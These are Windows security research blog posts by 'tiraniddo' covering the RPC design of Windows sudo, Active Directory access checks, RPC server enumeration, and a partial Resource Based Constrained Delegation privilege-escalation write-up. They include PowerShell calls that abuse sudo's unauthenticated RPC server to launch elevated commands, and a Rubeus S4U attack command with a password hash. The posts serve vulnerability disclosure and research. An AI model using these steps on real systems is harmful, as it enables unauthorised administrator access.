
Sudo On Windows a Quick Rundown

By: tiraniddo
9 February 2024 at 09:10

Background

The Windows Insider Preview build 26052 just shipped with a sudo command, so I thought I'd take a quick peek to see what it does and how it does it. This is only a short write-up of my findings; this code is probably still in its early stages, so I wouldn't want it to be treated too harshly. You can see the official announcement here.


To run a command using sudo you can just type:


C:\> sudo powershell.exe


The first thing to note, if you know anything about the security model of Windows (maybe buy my book, hint hint), is that there's no equivalent to SUID binaries. The only way to run a process at a higher privilege level is to get an existing higher privileged process to start it for you, or to have sufficient privileges yourself, such as SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, along with an access token for a more privileged user. Since Vista, the main way of facilitating running more privileged code as a normal user has been UAC. Therefore this is how sudo is doing it under the hood: it's just spawning a process via UAC using the ShellExecute runas verb.


This is slightly disappointing as I was hoping the developers would have implemented a sudo service running at a higher privilege level to mediate access. Instead this is really just a fancy executable that you can elevate using the existing UAC mechanisms. 


The other sad thing is that, as is Microsoft tradition, this is a sudo command in name only. It doesn't support any policies that would allow a user to run specific commands elevated, either with or without a password requirement. It'll just run anything you give it, and only if that user can pass a UAC elevation prompt.


There are four modes of operation that can be configured in system settings; why this needs to be a system setting I don't really know.


Initially sudo is disabled; running the sudo command just prints "Sudo is disabled on this machine. To enable it, go to the Developer Settings page in the Settings app". This isn't because of some fundamental limit in the sudo implementation; instead it's just an Enabled value in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo which is set to 0.
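

You can check which mode is currently configured with a quick registry query. A minimal sketch; the key only exists on builds that ship sudo, and the value meanings are those described in the following paragraphs:


PS> # 0 = disabled, 1 = new window, 2 = input disabled, 3 = inline
PS> Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo' -Name Enabled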


The next option (value 1) runs the command in a new window. All this does is pass the command line you gave to sudo to ShellExecute with the runas verb, therefore you just get the normal UAC dialog showing for that command. Considering the general move to using PowerShell for everything, you can already do this easily enough with the command:


PS> Start-Process -Verb runas powershell.exe


The third and fourth options (values 2 and 3) are "With input disabled" and "Inline". They're more or less the same: they run the command and attach it to the current console window by sharing the standard handles across to the new process. They use the same implementation behind the scenes to do this: a copy of the sudo binary is elevated with the command line and the calling PID of the non-elevated sudo. E.g. it might try running the following command via UAC:


C:\> sudo elevate -p 1234 powershell.exe


Oddly, as we’ll see passing the PID and the command seems to be mostly unnecessary. At best it’s useful if you want to show more information about the command in the UAC dialog, but again as we’ll see this isn’t that useful.


The only difference between the two is that with "With input disabled" you can only receive output from the elevated application, you can't interact with it, whereas the Inline mode allows you to run the command elevated in the same console session. This final mode has the obvious risk that the command is running elevated but attached to a low privileged window. Malicious code could inject keystrokes into that console window to control the privileged process. This was pointed out in the Microsoft blog post linked earlier. However, the blog does say that running with input disabled mitigates this issue somewhat; as we'll see, it does not.

How It Really Works

For the "New Window" mode all sudo is doing is acting as a wrapper to call ShellExecute. The inline modes require a bit more work. Again, go back and read the Microsoft blog post; tbh it gives a reasonable overview of how it works. The blog includes the following diagram, which I'll reproduce here in case the link dies.


A diagram showing how sudo on windows works. Importantly it shows that there's an RPC channel between a normal sudo process and an elevated one.


What always gets me interested is where there's an RPC channel involved. The reason a communications channel exists is due to the limitations of UAC: it very intentionally doesn't allow you to attach elevated console processes to an existing low privileged console (grumble, UAC is not a security boundary, but then why does it do this if it isn't, grumble). It also doesn't pass along a few important settings, such as the current directory or the environment, which would be useful features to have in a sudo-like command. Therefore to do all that it makes sense for the non-elevated sudo to pass that information to the elevated version.


Let’s check out the RPC server using NtObjectManager:


PS> $rpc = Get-RpcServer C:\windows\system32\sudo.exe
PS> Format-RpcServer $rpc
[
  uuid(F691B703-F681-47DC-AFCD-034B2FAAB911),
  version(1.0)
]
interface intf_f691b703_f681_47dc_afcd_034b2faab911 {
    int server_PrepareFileHandle([in] handle_t _hProcHandle, [in] int p0, [in, system_handle(sh_file)] HANDLE p1);
    int server_PreparePipeHandle([in] handle_t _hProcHandle, [in] int p0, [in, system_handle(sh_pipe)] HANDLE p1);
    int server_DoElevationRequest([in] handle_t _hProcHandle, [in, system_handle(sh_process)] HANDLE p0, [in] int p1, [in, string] char* p2, [in, size_is(p4)] byte* p3[], [in] int p4, [in, string] char* p5, [in] int p6, [in] int p7, [in, size_is(p9)] byte* p8[], [in] int p9);
    void server_Shutdown([in] handle_t _hProcHandle);
}


Of the four functions, the key one is server_DoElevationRequest. This is what actually does the elevation. Doing a quick bit of analysis it seems the parameters correspond to the following:


  • HANDLE p0 - Handle to the calling process.
  • int p1 - The type of the new process: 2 being input disabled, 3 being inline.
  • char* p2 - The command line to execute (oddly, in ANSI characters).
  • byte* p3[] - Not sure.
  • int p4 - Size of p3.
  • char* p5 - The current directory.
  • int p6 - Not sure, seems to be set to 1 when called.
  • int p7 - Not sure, seems to be set to 0 when called.
  • byte* p8 - Pointer to the environment block to use.
  • int p9 - Length of the environment block.


The RPC server is registered to use ncalrpc with the port name sudo_elevate_PID, where PID is just the value passed for the -p argument on the elevation command line. The PID isn't used for determining the console to attach to; the calling process is instead passed through the HANDLE parameter, which is only used to query its PID to pass to the AttachConsole API.


Also, as mentioned before, as far as I can tell the command line passed to the elevated sudo is unused; it's in fact this RPC call which is responsible for executing the command properly. This results in something interesting: the elevated copy of sudo doesn't exit once the new process has started. It in fact keeps the RPC server open and will accept further requests for new processes to attach. For example, you can do the following to get a running elevated sudo instance to attach an elevated command prompt to the current PowerShell console:


PS> $c = Get-RpcClient $rpc
PS> Connect-RpcClient $c -EndpointPath sudo_elevate_4652
PS> $c.server_DoElevationRequest((Get-NtProcess -ProcessId $pid), 3, "cmd.exe", @(), 0, "C:\", 1, 0, @(), 0)


There are no checks on the caller's PID to make sure it's really the non-elevated sudo making the request. As long as the RPC server is running you can make the call. Finding the ALPC port is easy enough; you can just enumerate all the ALPC ports in \RPC Control to find them.
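

For example, using the object manager drive that NtObjectManager provides, something like the following should list candidate ports while an elevated sudo instance is running (a sketch; adjust the filter as needed):


PS> ls "NtObject:\RPC Control" | Where-Object Name -Match '^sudo_elevate_'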


A further interesting thing to note is that the type parameter (p1) doesn't have to match the configured sudo mode in settings. Passing 2 runs the command with input disabled, but passing any other value runs in inline mode. Therefore even if sudo is configured in new window mode, there's nothing stopping you running the elevated sudo manually, getting a trusted Microsoft signed binary UAC prompt, and then attaching in inline mode via the RPC service. E.g. you can run sudo using the following PowerShell:


PS> Start-Process -Verb runas -FilePath sudo -ArgumentList "elevate", "-p", 1111, "cmd.exe"


Fortunately sudo will exit immediately if it’s configured in disabled mode, so as long as you don’t change the defaults it’s fine I guess.


I find it odd that Microsoft would rely on UAC when UAC is supposed to be going away. Even more so as this command could have just been a PowerToy; other than the settings UI changes it really doesn't need any integration with the OS to function. And in fact I'd argue that it doesn't need those settings either. At any rate, this is no more a security risk than UAC already is, or is it…


Looking back at how the RPC server is registered can be enlightening:


RPC_STATUS StartRpcServer(RPC_CSTR Endpoint) {
  RPC_STATUS result;

  result = RpcServerUseProtseqEpA("ncalrpc",
      RPC_C_PROTSEQ_MAX_REQS_DEFAULT, Endpoint, NULL);
  if ( !result )
  {
    result = RpcServerRegisterIf(server_sudo_rpc_ServerIfHandle, NULL, NULL);
    if ( !result )
      return RpcServerListen(1, RPC_C_PROTSEQ_MAX_REQS_DEFAULT, 0);
  }
  return result;
}


Oh no, that’s not good. The code doesn’t provide a security descriptor for the ALPC port and it calls RpcServerRegisterIf to register the server, which should basically never be used. This old function doesn’t allow you to specify a security descriptor or a security callback. What this means is that any user on the same system can connect to this service and execute sudo commands. We can double check using some PowerShell:


PS> $as = Get-NtAlpcServer
PS> $sudo = $as | ? Name -Match sudo
PS> $sudo.Name
sudo_elevate_4652
PS> Format-NtSecurityDescriptor $sudo -Summary
<Owner> : BUILTIN\Administrators
<Group> : DESKTOP-9CF6144\None
<DACL>
Everyone: (Allowed)(None)(Connect|Delete|ReadControl)
NT AUTHORITY\RESTRICTED: (Allowed)(None)(Connect|Delete|ReadControl)
BUILTIN\Administrators: (Allowed)(None)(Full Access)
BUILTIN\Administrators: (Allowed)(None)(Full Access)


Yup, the DACL for the ALPC port grants access to the Everyone group. It would even allow restricted tokens with the RESTRICTED SID set, such as the Chromium GPU processes, to access the server. This is pretty poor security engineering and you have to wonder how this got approved to ship in such a prominent form.


The worst case scenario is an admin using this command on a shared server, such as a terminal server; any other user on the system could then gain their administrator access. Oh well, such is life…


I will give Microsoft props though for writing the code in Rust, at least most of it. Of course it turns out the likelihood that it would have had any useful memory corruption flaws is low, even if they'd written it in ANSI C. This is a good lesson in why just writing in Rust isn't going to save you if you end up introducing logic bugs instead.


Access Checking Active Directory

By: tiraniddo
17 July 2022 at 04:49

Like many Windows related technologies Active Directory uses a security descriptor and the access check process to determine what access a user has to parts of the directory. Each object in the directory contains an nTSecurityDescriptor attribute which stores the binary representation of the security descriptor. When a user accesses the object through LDAP the remote user's token is used with the security descriptor to determine if they have the rights to perform the operation they're requesting.
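
If you want to look at the raw security descriptor yourself, you can read it with .NET's DirectoryServices classes. A minimal sketch; the DN is a placeholder for an object in your own domain:

PS> $entry = [ADSI]'LDAP://DC=domain,DC=local'
PS> $entry.PsBase.Options.SecurityMasks = 'Owner,Group,Dacl'
PS> $entry.PsBase.ObjectSecurity.GetSecurityDescriptorSddlForm('Owner,Group,Access')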

Weak security descriptors are a common misconfiguration that could result in the entire domain being compromised. Therefore it's important for an administrator to be able to find and remediate security weaknesses. Unfortunately Microsoft doesn't provide a means for an administrator to audit the security of AD, at least not in any default tool I know of. There is third-party tooling, such as Bloodhound, which will perform this analysis offline, but from reading the implementation of the checking it doesn't tend to use the real access check APIs and so likely misses some misconfigurations.

I wrote my own access checker for AD which is included in my NtObjectManager PowerShell module. I've used it to find a few vulnerabilities, such as CVE-2021-34470 which was an issue with Exchange's changes to AD. This works "online", as in you need an active account in the domain to run it; however, AFAIK it should provide the most accurate results if what you're interested in is what access a specific user has to AD objects. While the command is available in the module it's perhaps not immediately obvious how to use it and interpret the results, therefore I decided I should write a quick blog post about it.

A Complex Process

The access check process is mostly documented by Microsoft in [MS-ADTS]: Active Directory Technical Specification, specifically in section 5.1.3. However, this leaves many questions unanswered. I'm not going to go through how it works in full either, but let me give a quick overview. I'm going to assume you have a basic knowledge of the structure of AD and its objects.

An AD object contains many resources for which access might need to be granted or denied to a particular user. For example you might want to allow the user to create only certain types of child objects, or to only modify certain attributes. There are many ways that Microsoft could have implemented security, but they decided on extending the ACL format to introduce the object ACE. For example the ACCESS_ALLOWED_OBJECT_ACE structure adds two GUIDs to the normal ACCESS_ALLOWED_ACE.

The first GUID, ObjectType, indicates the type of object that the ACE applies to. For example this can be set to the schema ID of an attribute, and the ACE will grant access to only that attribute, nothing else. The second GUID, InheritedObjectType, is only used during ACL inheritance. It represents the schema ID of the object class that is allowed to inherit this ACE. For example if it's set to the schema ID of the computer class, then the ACE will only be inherited if an object of that class is created; it will not be if, say, a user object is created instead. We only need to care about the first of these GUIDs when doing an access check.

To perform an access check you need to use an API such as AccessCheckByType which supports checking the object ACEs. When calling the API you pass a list of object type GUIDs you want to check for access on. When processing the DACL, if an ACE has an ObjectType GUID which isn't in the passed list it'll be ignored; otherwise it'll be handled according to the normal access check rules. If the ACE isn't an object ACE then it'll also be processed.

If all you want to do is check if a local user has access to a specific object or attribute then it's pretty simple. Just get the access token for that user, add the object's GUID to the list and call the access check API (see the sketch after the list below). The resulting granted access can be one of the following specific access rights; note the names in parentheses are the ones I use in the PowerShell module for simplicity:
  • ACTRL_DS_CREATE_CHILD (CreateChild) - Create a new child object
  • ACTRL_DS_DELETE_CHILD (DeleteChild) - Delete a child object
  • ACTRL_DS_LIST (List) - Enumerate child objects
  • ACTRL_DS_SELF (Self) - Grant a write-validated extended right
  • ACTRL_DS_READ_PROP (ReadProp) - Read an attribute
  • ACTRL_DS_WRITE_PROP (WriteProp) - Write an attribute
  • ACTRL_DS_DELETE_TREE (DeleteTree) - Delete a tree of objects
  • ACTRL_DS_LIST_OBJECT (ListObject) - List a tree of objects
  • ACTRL_DS_CONTROL_ACCESS (ControlAccess) - Grant a control extended right
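
As a rough sketch of that simple case using NtObjectManager: given a security descriptor $sd read from an object, build an object type list and ask for the granted access. Treat this as an assumption to check rather than a definitive recipe: the cmdlet and parameter names (New-ObjectTypeTree and the ObjectType parameter of Get-NtGrantedAccess) should be verified against the module's help.

PS> # Hypothetical schema ID; substitute the GUID of the attribute or class you care about.
PS> $tree = New-ObjectTypeTree -ObjectType '19195a5a-6da0-11d0-afd3-00c04fd930c9'
PS> Get-NtGrantedAccess -SecurityDescriptor $sd -ObjectType $tree
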
You can also be granted standard rights such as READ_CONTROL, WRITE_DAC or DELETE, which do what you'd expect them to do. However, if you want to see what the maximum granted access on the DC would be, it's slightly more difficult. We have the following problems:
  • The list of groups granted to a local user is unlikely to match what they're granted on the DC where the real access check takes place.
  • AccessCheckByType only returns a single granted access value; if we have a lot of object types to test, it'd be quite expensive to call it 100s if not 1000s of times for a single security descriptor.
While you could solve the first problem by having sufficient local privileges to manually create an access token, and the second by using an API which returns a list of granted access such as AccessCheckByTypeResultList, there's a "simpler" solution. You can use the Authz APIs: these allow you to manually build a security context with any groups you like without needing to create an access token, and the AuthzAccessCheck API supports returning a list of granted access for each object in the type list. It just so happens that this API is the one used by the AD LDAP server itself.

Therefore to perform a "correct" maximum access check you need to do the following steps.
  1. Enumerate the user's group list for the DC from the AD. Local group assignments are stored in the directory's CN=Builtin container.
  2. Build an Authz security context with the group list.
  3. Read a directory object's security descriptor.
  4. Read the object's schema class and build a list of specific schema objects to check:
  • All attributes from the class and its super, auxiliary and dynamic auxiliary classes.
  • All allowable child object classes.
  • All assignable control, write-validated and property set extended rights.
  5. Convert the gathered schema information into the object type list for the access check.
  6. Run the access check and handle the results.
  7. Repeat from step 3 for every object you want to check.

Trust me when I say this process is easier said than done. There are many nuances that produce surprising results; I guess this is why most tooling just doesn't bother. Also my code includes a fair amount of knowledge gathered from reverse engineering the real implementation, but I'm sure I could have missed something.

    Using Get-AccessibleDsObject and Interpreting the Results

    Let's finally get to using the PowerShell command, which is the real purpose of this blog post. For a simple check, run the following command. This can take a while on the first run as it gathers information about the domain and the user.

    PS> Get-AccessibleDsObject -NamingContext Default
    Name   ObjectClass UserName       Modifiable Controllable
    ----   ----------- --------       ---------- ------------
    domain domainDNS   DOMAIN\alice   False      True

    This uses the NamingContext parameter to specify what object to check. The parameter allows you to easily specify the three main directories: Default, Configuration and Schema. You can also use the DistinguishedName parameter to specify an explicit DN, and the Domain parameter to specify the domain of the LDAP server if you don't want to inspect the current user's domain. You can also specify the Recurse parameter to recursively enumerate objects; in this case we just access check the root object.

    The access check defaults to using the current user's groups, based on what they would be on the DC. This is obviously important, especially if the current user is a local administrator, as they wouldn't be guaranteed to have administrator rights on the DC. You can specify different users to check, either by SID using the UserSid parameter, or by name using the UserName parameter. These parameters can take multiple values, which will run multiple checks against the list of enumerated objects. For example, to check using the domain administrator you could do the following:

    PS> Get-AccessibleDsObject -NamingContext Default -UserName DOMAIN\Administrator
    Name   ObjectClass UserName             Modifiable Controllable
    ----   ----------- --------             ---------- ------------
    domain domainDNS   DOMAIN\Administrator True       True

    The basic table format for the access check results shows five columns: the common name of the object, its schema class, the user that was checked, and whether the access check resulted in any modifiable or controllable access being granted. Modifiable covers things like being able to write attributes or create/delete child objects. Controllable indicates one or more control extended rights were granted to the user, such as allowing the user's password to be changed.

    As this is PowerShell, the access check result is an object with many properties. The following properties are probably the ones of most interest when determining what access is granted to the user (see the example after the list):
    • GrantedAccess - The granted access when only specifying the object's schema class during the check. If an access is granted at this level it'd apply to all values of that type, for example if WriteProp is granted then any attribute in the object can be written by the user.
    • WritableAttributes - The list of attributes a user can modify.
    • WritablePropertySets - The list of writable property sets a user can modify. Note that this is more for information purposes, the modifiable attributes will also be in the WritableAttributes property which is going to be easier to inspect.
    • GrantedControl - The list of control extended rights granted to a user.
    • GrantedWriteValidated - The list of write validated extended rights granted to a user.
    • CreateableClasses - The list of child object classes that can be created.
    • DeletableClasses - The list of child object classes that can be deleted.
    • DistinguishedName - The full DN of the object.
    • SecurityDescriptor - The security descriptor used for the check.
    • TokenInfo - The user's information used in the check, such as the list of groups.
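
    For example, to pull the most interesting of these properties out of a recursive check, it's just standard PowerShell filtering over the properties listed above:

    PS> Get-AccessibleDsObject -NamingContext Default -Recurse | Where-Object Modifiable | Select-Object DistinguishedName, WritableAttributes, CreateableClasses
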
    The command should be pretty easy to use. That said, it does come with a few caveats. First, you can only use the command with direct access to the AD using a domain account. Technically there's no reason you couldn't implement a gatherer like Bloodhound and do the access check offline, but I just haven't. I've also not tested it in weirder setups such as complex domain hierarchies or RODCs.

    If you're using a low-privileged user there are likely to be AD objects that you can't enumerate or read the security descriptor from. This means the results are going to depend on the user you use to enumerate with. The best results would come from using a domain/enterprise administrator with full access to everything.

    Based on my testing, when I've found an access being granted to a user it has seemed to be real; however, it's possible I'm not always 100% correct or that I'm missing accesses. Also it's worth noting that just having access doesn't mean there isn't some extra checking done by the LDAP server. For example there's an explicit block on creating Group Managed Service Accounts in Computer objects, even though that would appear to be a creatable child object.

    Finding Running RPC Server Information with NtObjectManager

    By: tiraniddo
    26 June 2022 at 21:56

    When doing security research I regularly use my NtObjectManager PowerShell module to discover and call RPC servers on Windows. Typically I'll use the Get-RpcServer command, passing the name of a DLL or EXE file to extract the embedded RPC servers. I can then use the returned server objects to create a client to access the server and call its methods. A good blog post about how some of this works was written recently by blueclearjar.

    Using Get-RpcServer only gives you a list of what RPC servers could possibly be running, not whether they are running and, if so, in what process. This is where RpcView does better, as it parses a process' in-memory RPC structures to find what is registered and where. Unfortunately this is something that I've yet to implement in NtObjectManager.

    However, it turns out there are various ways to get the running RPC server information, provided by the OS and the RPC runtime, which we can use to build a more or less complete list of running servers. I've exposed all the ones I know about in some recent updates to the module. Let's go through the various ways you can piece together this information.

    NOTE: some of the examples of PowerShell code will need a recent build of the NtObjectManager module. For various reasons I've not been updating the version on the PS Gallery, so get the source code from github and build it yourself.

    RPC Endpoint Mapper

    If you're lucky this is the simplest way to find out if a particular RPC server is running. When an RPC server is started, the service can register an RPC interface with the RPC endpoint mapper service running in RPCSS using the function RpcEpRegister, specifying the interface UUID and version along with the binding information. This registers all current RPC endpoints the server is listening on, keyed against the RPC interface.

    You can query the endpoint table using the RpcMgmtEpEltInqBegin and RpcMgmtEpEltInqNext APIs. I expose this through the Get-RpcEndpoint command. Running Get-RpcEndpoint with no parameters returns all interfaces the local endpoint mapper knows about as shown below.

    PS> Get-RpcEndpoint
    UUID                                 Version Protocol     Endpoint      Annotation
    ----                                 ------- --------     --------      ----------
    51a227ae-825b-41f2-b4a9-1ac9557a1018 1.0     ncacn_ip_tcp 49669         
    0497b57d-2e66-424f-a0c6-157cd5d41700 1.0     ncalrpc      LRPC-5f43...  AppInfo
    201ef99a-7fa0-444c-9399-19ba84f12a1a 1.0     ncalrpc      LRPC-5f43...  AppInfo
    ...

    Note that in addition to the interface UUID and version the output shows the binding information for the endpoint, such as the protocol sequence and endpoint. There is also a free form annotation field, but that can be set to anything the server likes when it calls RpcEpRegister.

    The APIs also allow you to specify a remote server hosting the endpoint mapper. You can use this to query what RPC servers are running on a remote server, assuming the firewall doesn't block you. To do this you'd need to specify a binding string for the SearchBinding parameter as shown.

    PS> Get-RpcEndpoint -SearchBinding 'ncacn_ip_tcp:primarydc'
    UUID                                 Version Protocol     Endpoint     Annotation
    ----                                 ------- --------     --------     ----------
    d95afe70-a6d5-4259-822e-2c84da1ddb0d 1.0     ncacn_ip_tcp 49664
    5b821720-f63b-11d0-aad2-00c04fc324db 1.0     ncacn_ip_tcp 49688
    650a7e26-eab8-5533-ce43-9c1dfce11511 1.0     ncacn_np     \PIPE\ROUTER Vpn APIs
    ...

    The big issue with the RPC endpoint mapper is it only contains RPC interfaces which were explicitly registered against an endpoint. The server could contain many more interfaces which could be accessible, but as they weren't registered they won't be returned from the endpoint mapper. Registration will typically only be used if the server is using an ephemeral name for the endpoint, such as a random TCP port or auto-generated ALPC name.

    Pros:

    • Simple command to run to get a good list of running RPC servers.
    • Can be run against remote servers to find out remotely accessible RPC servers.
    Cons:
    • Only returns the RPC servers intentionally registered.
    • Doesn't directly give you the hosting process, although the optional annotation might give you a clue.
    • Doesn't give you any information about what the RPC server does, you'll need to find what executable it's hosted in and parse it using Get-RpcServer.

    Service Executable

    If the RPC servers you extract are in a registered system service executable then the module will try and work out what service that corresponds to by querying the SCM. The default output from the Get-RpcServer command will show this as the Service column shown below.

    PS> Get-RpcServer C:\windows\system32\appinfo.dll
    Name        UUID                                 Ver Procs EPs Service Running
    ----        ----                                 --- ----- --- ------- -------
    appinfo.dll 0497b57d-2e66-424f-a0c6-157cd5d41700 1.0 7     1   Appinfo True
    appinfo.dll 58e604e8-9adb-4d2e-a464-3b0683fb1480 1.0 1     1   Appinfo True
    appinfo.dll fd7a0523-dc70-43dd-9b2e-9c5ed48225b1 1.0 1     1   Appinfo True
    appinfo.dll 5f54ce7d-5b79-4175-8584-cb65313a0e98 1.0 1     1   Appinfo True
    appinfo.dll 201ef99a-7fa0-444c-9399-19ba84f12a1a 1.0 7     1   Appinfo True

    The output also shows that the appinfo.dll executable is the implementation of the Appinfo service, which is the general name for the UAC service. Note it also shows whether the service is running, but that's just for convenience. You can use this information to find what process is likely to be hosting the RPC server by querying for the service PID if it's running.

    PS> Get-Win32Service -Name Appinfo
    Name    Status  ProcessId
    ----    ------  ---------
    Appinfo Running 6020

    The output also shows that each of the interfaces has an endpoint which is registered against the interface UUID and version. This is extracted from the endpoint mapper, which again makes it only a convenience. However, if you pick an executable which isn't a service implementation the results are less useful:

    PS> Get-RpcServer C:\windows\system32\efslsaext.dll
    Name          UUID                   Ver Procs EPs Service Running      
    ----          ----                   --- ----- --- ------- -------      
    efslsaext.dll c681d488-d850-11d0-... 1.0 21    0           False

    The efslsaext.dll contains one of the EFS implementations, which are all hosted in LSASS. However, it's not a registered service so the output doesn't show a service name, and it's also not registered with the endpoint mapper so it doesn't show any endpoints, but it is running.

    Pros:

    • If the executable's a service it gives you a good idea of who's hosting the RPC servers and if they're currently running.
    • You can get the RPC server interface information along with that information.
    Cons:
    • If the executable isn't a service it doesn't directly help.
    • It doesn't ensure the RPC servers are running if they're not registered in the endpoint mapper. 
    • Even if the service is running it might not have enabled the RPC servers.

    Enumerating Process Modules

    Extracting the RPC servers from an arbitrary executable is fine offline, but what if you want to know what RPC servers are running right now? This is similar to RpcView's process list GUI: you can look at a process and find all the services running within it.

    It turns out there's a really obvious way of getting a list of the potential services running in a process: enumerate the loaded DLLs using an API such as EnumerateLoadedModules, and then run Get-RpcServer on each one to extract the potential services. To use the APIs you'd need at least read access to the target process, which means you'd really want to be an administrator, but that's no different to RpcView's limitations.
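
    As a rough sketch of doing this by hand, before using the built-in support described below: Get-Process exposes the loaded module list (assuming you have read access to the target), and each module path can be fed to Get-RpcServer. PID 6020 is the Appinfo service process from earlier.

    PS> (Get-Process -Id 6020).Modules.FileName | Sort-Object -Unique | ForEach-Object { Get-RpcServer $_ }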

    The big problem is that just because a module is loaded doesn't mean the RPC server is running. For example the WinHTTP DLL has a built-in RPC server which is only started when running the WinHTTP proxy service, but the DLL could be loaded in any process which uses the APIs.

    To simplify things I expose this approach through the Get-RpcServer function with the ProcessId parameter. You can also use the ServiceName parameter to look up a service PID if you're interested in a specific service.

    PS> Get-RpcServer -ServiceName Appinfo
    Name        UUID                        Ver Procs EPs Service Running
    ----        ----                        --- ----- --- ------- -------
    RPCRT4.dll  afa8bd80-7d8a-11c9-bef4-... 1.0 5     0           False
    combase.dll e1ac57d7-2eeb-4553-b980-... 0.0 0     0           False
    combase.dll 00000143-0000-0000-c000-... 0.0 0     0           False

    Pros:

    • You can determine all RPC servers which could be potentially running for an arbitrary process.
    Cons:
    • It doesn't ensure the RPC servers are running if they're not registered in the endpoint mapper. 
    • You can't directly enumerate the module list, except for the main executable, from a protected process (there are various tricks to do so, but they're out of scope here).

    Asking an RPC Endpoint Nicely

    The final approach is just to ask an RPC endpoint nicely to tell you what RPC servers it supports. We don't need to go digging into the guts of a process to do this; all we need is the binding string for the endpoint we want to query, and then we can call the RpcMgmtInqIfIds API.

    This will only return the UUID and version of each RPC server accessible from the endpoint, not the full RPC server information. But it will give you an exact list of all supported RPC servers; in fact it's so detailed it'll give you all the COM interfaces that the process is listening on as well. To query this list you only need access to the endpoint transport, not the process itself.

    How do you get the endpoints though? One approach, if you do have access to the process, is to enumerate its server ALPC ports by getting a list of handles for the process, finding the ports with the \RPC Control\ prefix in their name, and then using that to form the binding string. This approach is exposed through Get-RpcEndpoint's ProcessId parameter. Again it also supports a ServiceName parameter to simplify querying services.

    PS> Get-RpcEndpoint -ServiceName AppInfo
    UUID              Version Protocol Endpoint     
    ----              ------- -------- --------  
    0497b57d-2e66-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    201ef99a-7fa0-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    ...

    If you don't have access to the process you can do it in reverse by enumerating potential endpoints and querying each one. For example you could enumerate the \RPC Control object directory and query each port. Since Windows 10 19H1, ALPC clients can query the server's PID, so you can not only find the exposed RPC servers but also what process they're running in. To query from the name of an ALPC port, use the AlpcPort parameter with Get-RpcEndpoint.

    PS> Get-RpcEndpoint -AlpcPort LRPC-0ee3261d56342eb7ac
    UUID              Version Protocol Endpoint     
    ----              ------- -------- --------  
    0497b57d-2e66-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    201ef99a-7fa0-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    ...

    Pros:

    • You can determine exactly what RPC servers are running in a process.
    Cons:
    • You can't directly determine what the RPC server does as the list gives you no information about which module is hosting it.

    Combining Approaches

    Obviously no one approach is perfect. However, you can get most of the way towards RpcView's process list by combining the module enumeration approach with asking the endpoint nicely. For example, you could first get a list of potential interfaces by enumerating the modules and parsing the RPC servers, then filter that list to only the ones which are running by querying the endpoint directly. This will also get you a list of the ALPC server ports that the RPC server is running on, so you can directly connect to it with a manually built client. An example script for doing this is on github.
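
    The core of the idea fits in a few lines. A sketch, assuming the ProcessId parameters described above, and that the returned server and endpoint objects both expose the interface UUID through an InterfaceId property; verify the property names against the module:

    PS> $procId = 6020
    PS> $servers = Get-RpcServer -ProcessId $procId
    PS> $running = (Get-RpcEndpoint -ProcessId $procId).InterfaceId
    PS> $servers | Where-Object { $_.InterfaceId -in $running }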

    We are still missing some crucial information that RpcView can access, such as the interface registration flags, with any of these approaches. Still, hopefully this gives you a few ways to approach analyzing the RPC attack surface of the local system and determining what endpoints you can call.

    Exploiting RBCD Using a Normal User Account*

    By: tiraniddo
    14 May 2022 at 02:29

    * Caveats apply.

    Resource Based Constrained Delegation (RBCD) privilege escalation, described by Elad Shamir in the "Wagging the Dog" blog post, is a devious way of exploiting Kerberos to elevate privileges on a local Windows machine. All it requires is write access to the local computer's domain account to modify the msDS-AllowedToActOnBehalfOfOtherIdentity LDAP attribute to add another account's SID. You can then use that account with the Services For User (S4U) protocols to get a Kerberos service ticket for the local machine as any user on the domain, including local administrators. From there you can create a new service or do whatever else you need to do.

    The key is how you write to the LDAP server under the local computer's domain account. There have been various approaches, usually abusing authentication relay. For example, I described one relay vector which abused DCOM. Someone else has since put this together into a turnkey tool, KrbRelayUp.

    One additional criterion for this to work is having access to another computer account to perform the attack. Well, this isn't strictly true; there's the Shadow Credentials attack which allows you to reuse the same local computer account, but in general you need a computer account you control. Normally this isn't a problem, as the DC allows normal users to create new computer accounts up to a limit set by the domain's ms-DS-MachineAccountQuota attribute value. This attribute defaults to 10, but an administrator could set it to 0 and block the attack, which is probably recommended.
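
    As an aside, you can check your domain's current quota with the RSAT ActiveDirectory module. A quick sketch, assuming the module is installed and you're querying your own domain:

    PS> Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota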

    But I wondered why this wouldn't work as a normal user. The msDS-AllowedToActOnBehalfOfOtherIdentity attribute just needs the SID of the account to be allowed to delegate to the computer. Why can't we just add the user's SID and perform the S4U dance? To give us the best chance I'll assume we have knowledge of the user's password; how you get this is entirely up to you. Running the attack through Rubeus shows our problem.

    PS C:\> Rubeus.exe s4u /user:charlie /domain:domain.local /dc:primarydc.domain.local /rc4:79bf93c9501b151506adc21ba0397b33 /impersonateuser:Administrator /msdsspn:cifs/WIN10TEST.domain.local

       ______        _
      (_____ \      | |
       _____) )_   _| |__  _____ _   _  ___
      |  __  /| | | |  _ \| ___ | | | |/___)
      | |  \ \| |_| | |_) ) ____| |_| |___ |
      |_|   |_|____/|____/|_____)____/(___/
      v2.0.3
    [*] Action: S4U
    [*] Using rc4_hmac hash: 79bf93c9501b151506adc21ba0397b33
    [*] Building AS-REQ (w/ preauth) for: 'domain.local\charlie'
    [*] Using domain controller: 10.0.0.10:88
    [+] TGT request successful!
    [*] base64(ticket.kirbi):
          doIFc...
    [*] Action: S4U
    [*] Building S4U2self request for: 'Administrator@domain.local'
    [*] Using domain controller: primarydc.domain.local (10.0.0.10)
    [*] Sending S4U2self request to 10.0.0.10:88
    [X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN
    [X] S4U2Self failed, unable to perform S4U2Proxy.

    We don't even get past the first S4U2Self stage of the attack; it fails with a KDC_ERR_S_PRINCIPAL_UNKNOWN error. This error typically indicates the KDC doesn't know what encryption key to use for the generated ticket. If you add an SPN to the user's account, however, it all succeeds. This would imply it's not a problem with a user account per se, but instead just a problem of the KDC not being able to select the correct key.

